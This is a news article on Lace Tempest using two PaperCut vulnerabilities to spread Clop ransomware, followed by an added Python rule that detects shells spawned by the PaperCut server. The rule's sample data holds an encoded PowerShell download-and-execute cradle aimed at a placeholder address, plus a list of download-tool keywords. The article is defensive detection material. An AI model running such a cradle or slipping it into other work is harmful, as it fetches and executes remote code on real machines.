Hackers Utilize PaperCut Printer Vulnerability To Spread Clop Ransomware
The threat actors behind the Clop ransomware operation are exploiting two recently disclosed vulnerabilities in PaperCut, a widely used print management product, to steal corporate data from targets.
Microsoft attributed the attacks to a group it tracks as Lace Tempest, whose activity overlaps with the groups known as FIN11 and TA505.
Lace Tempest is financially motivated and operates as a Clop affiliate: it carries out the intrusions and deploys Clop ransomware, and in return receives a share of the proceeds from successful attacks.
Lace Tempest & Clop Ransomware
According to Microsoft, Lace Tempest has been exploiting two PaperCut vulnerabilities, CVE-2023-27350 and CVE-2023-27351, to deliver Clop ransomware since April 13, when the company first observed the activity.
Last week, the Cybersecurity and Infrastructure Security Agency (CISA) warned that threat actors had exploited the vulnerabilities to gain entry to unpatched PaperCut servers on customer networks.
PaperCut published its first advisory about the flaws on March 8, together with fixed releases. The company said it had been notified of the vulnerabilities by Trend Micro researchers on January 10.
Of the two, CVE-2023-27350 is the more severe: it lets an unauthenticated attacker run code remotely on the PaperCut application server. CVE-2023-27351 lets an unauthenticated attacker pull information about users from the server, including usernames, full names, email addresses, and any card numbers associated with those accounts.
PaperCut makes print management software that works with printers from Canon, Epson, Xerox, and almost every other major brand. More than 70,000 organizations around the world, including government agencies, universities, and large companies, use its tools.
Microsoft reported that, after exploiting the vulnerabilities, Lace Tempest ran several PowerShell commands on the compromised PaperCut servers to deliver a TrueBot malware downloader, which it then used to extend the intrusion.
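The behaviour described above, a print server process launching PowerShell to fetch a downloader, is the kind of parent/child process relationship a detection engineer would hunt for. The following is an added example, not code from the article, Microsoft, or PaperCut. It runs a simple rule over constructed Sysmon-style process-creation events and assumes (the page does not say this) that the PaperCut application server runs as `pc-app.exe`; the field names, sample paths, and the TEST-NET address in the sample command line are likewise constructed for illustration.

```python
"""Flag PowerShell or cmd.exe spawned by the PaperCut application server.

Added example; not code from the article, Microsoft, or PaperCut.
Assumptions (not stated on the page): the PaperCut NG/MF application
server runs as pc-app.exe, and process-creation telemetry is available
as dicts with Sysmon-style field names (ParentImage, Image, CommandLine).
"""
import base64
import re

PAPERCUT_SERVER = "pc-app.exe"  # assumption: PaperCut application server binary
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
CRADLE_KEYWORDS = ("downloadstring", "downloadfile", "invoke-webrequest",
                   "iwr ", "curl ", "bitsadmin", "certutil")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
ENC_RE = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(ev):
    """Return a finding dict if the event matches the rule, else None.

    Rule: pc-app.exe as parent AND a shell as child. Indicators are added
    when the command line carries an encoded command or a download cradle.
    """
    parent = _basename(ev.get("ParentImage", ""))
    child = _basename(ev.get("Image", ""))
    if parent != PAPERCUT_SERVER or child not in SHELLS:
        return None
    cmdline = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    indicators = []
    if decoded is not None:
        indicators.append("encoded-command")
    text = (decoded if decoded is not None else cmdline).lower()
    if any(k in text for k in CRADLE_KEYWORDS):
        indicators.append("download-cradle")
    return {"time": ev.get("UtcTime"), "child": child,
            "indicators": indicators, "decoded": decoded}


def triage(events):
    """Run triage_event over a list of events and return the findings."""
    return [f for f in (triage_event(e) for e in events) if f is not None]


# Constructed sample telemetry (not real events). The cradle points at a
# TEST-NET address and is encoded the way PowerShell expects (UTF-16LE).
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/t')"
_ENC = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"UtcTime": "2023-04-14 02:11:07",
     "ParentImage": r"C:\Program Files\PaperCut NG\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENC},
    {"UtcTime": "2023-04-14 02:11:09",   # wrong parent: ordinary user activity
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"UtcTime": "2023-04-14 02:11:12",   # right parent, non-shell child
     "ParentImage": r"C:\Program Files\PaperCut NG\server\bin\win\pc-app.exe",
     "Image": r"C:\Program Files\PaperCut NG\runtime\jre\bin\java.exe",
     "CommandLine": "java.exe -server"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["time"], finding["child"], finding["indicators"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

In production the parent-process check belongs in the SIEM or EDR query itself (for example a Sysmon Event ID 1 rule keyed on ParentImage); the decoding step is what turns an opaque `-enc` blob into something an analyst can read and match against known download cradles.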
In previous attacks, Lace Tempest has been observed using exploits for Fortra's GoAnywhere MFT file transfer product and the Raspberry Robin worm to deliver ransomware, two techniques commonly associated with the Clop ransomware group.
Microsoft said it is also observing other attacks exploiting these vulnerabilities, including breaches leading to the deployment of LockBit, another major ransomware operation.